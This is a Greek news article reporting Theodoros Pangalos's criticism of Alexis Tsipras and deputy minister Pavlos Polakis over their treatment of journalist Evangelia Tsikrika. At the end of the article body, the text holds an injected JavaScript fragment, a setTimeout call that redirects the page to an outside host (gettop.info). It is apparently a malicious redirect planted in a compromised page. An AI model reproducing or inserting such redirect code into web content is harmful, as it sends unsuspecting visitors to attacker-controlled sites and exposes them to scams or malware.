Πάγκαλος: Ο Πρωθυπουργός δεν έχει το δικαίωμα να χάνει την ψυχραιμία του

0
5

 

Με αφορμή την απάντηση του Αλέξη Τσίπρα στη δημοσιογράφο του ALPHA Ευαγγελία Τσικρίκα, στη ΔΕΘ, για το μέλλον των εργαζομένων στα κανάλια που δεν πήραν άδειες, ο Θεόδωρος Πάγκαλος, στον ρ/σ Βήμα FM, σχολίασε: «Τα παιδιά μεταξύ 2 και 5 ετών αναζητούν τα όριά τους. Κάπου πρέπει να τα συναντούν. Ο κ. Τσίπρας δεν έχει συναντήσει ποτέ τα όριά του».

Σύμφωνα με τον κ. Πάγκαλο, «κανείς δεν έχει το δικαίωμα, όταν προσφέρεται για τέτοιου είδους διαδικασίες, όπως είναι μία συνέντευξη Τύπου, να χάνει την ψυχραιμία του».

Εξάλλου, με αφορμή τη επίθεση του αναπληρωτή υπουργού Υγείας Παύλου Πολάκη στην κ. Τσικρίκα, διερωτήθηκε: «Με τη δημοσιογράφο τι λόγο είχε να τα βάλει; Έχει καμιά σχέση με την Υγεία;»

«Ο Πολάκης νομίζω ότι είναι προϊόν του ΠΑΣΟΚ, από την ανοχή που έδειχνε το ΠΑΣΟΚ προς τους διάφορους Πολάκηδες, οι οποίοι ανεπτύχθησαν παντού, υβρίζοντας και συκοφαντώντας. Υφυπουργός Υγείας ήταν, είχε όλα τα δεδομένα για να περάσει απαρατήρητος», τόνισε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here